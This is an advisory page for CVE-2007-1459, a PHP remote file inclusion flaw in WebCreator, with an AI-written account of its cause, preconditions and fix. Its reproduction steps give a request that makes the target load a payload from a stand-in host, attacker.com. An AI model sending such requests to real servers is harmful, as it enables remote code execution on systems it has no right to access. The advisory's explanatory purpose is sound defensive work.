VYPR
← All advisories
Unrated severityNVD Advisory· Published Mar 14, 2007· Updated Apr 23, 2026

CVE-2007-1459

CVE-2007-1459

Description

Multiple PHP remote file inclusion vulnerabilities in WebCreator 0.2.6-rc3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the moddir parameter to (1) content/load.inc.php, (2) config/load.inc.php, (3) http/load.inc.php, and unspecified other files.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

3
  • Webcreator/Webcreator3 versions
    cpe:2.3:a:webcreator:webcreator:0.2.5:*:*:*:*:*:*:*+ 2 more
    • cpe:2.3:a:webcreator:webcreator:0.2.5:*:*:*:*:*:*:*
    • cpe:2.3:a:webcreator:webcreator:0.2.6_rc3:*:*:*:*:*:*:*
    • (no CPE)range: <=0.2.6-rc3

Patches

Vulnerability mechanics

Root cause

"Missing input validation on the $moddir parameter allows remote file inclusion via include_once."

Attack vector

An attacker can supply a URL in the `moddir` query parameter to any of the affected `load.inc.php` files. Because the `$moddir` variable is not validated before being passed to `include_once`, the server will include and execute arbitrary remote PHP code. The attack requires only that the target server has `register_globals` enabled (or that the variable is otherwise injectable) and that the `allow_url_include` PHP setting is active [ref_id=1].

Affected code

The vulnerability resides in `mods/content/load.inc.php`, `config/load.inc.php`, and `http/load.inc.php`. Each file contains an `include_once($moddir . '/functions.lib.php')` call that uses the unsanitized `$moddir` parameter [ref_id=1].

What the fix does

No patch is provided in the bundle. The advisory recommends sanitizing the `$moddir` variable in all affected files and disabling `register_globals` as a hardening measure [ref_id=1]. A proper fix would validate that `$moddir` is a local path within an allowed directory, or remove the user-controllable parameter entirely.

Preconditions

  • configPHP register_globals must be enabled (or the variable must otherwise be injectable)
  • configPHP allow_url_include must be enabled for remote file inclusion
  • networkAttacker must be able to send HTTP requests to the vulnerable load.inc.php files
  • inputThe moddir parameter is passed unsanitized into include_once

Reproduction

1. Host a PHP payload (e.g., `inject.txt`) on an attacker-controlled web server. 2. Send a request to the vulnerable script: `http://target/mods/config/load.inc.php?moddir=http://attacker.com/inject.txt?` 3. The server will include and execute the remote payload [ref_id=1].

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

6

News mentions

0

No linked articles in our index yet.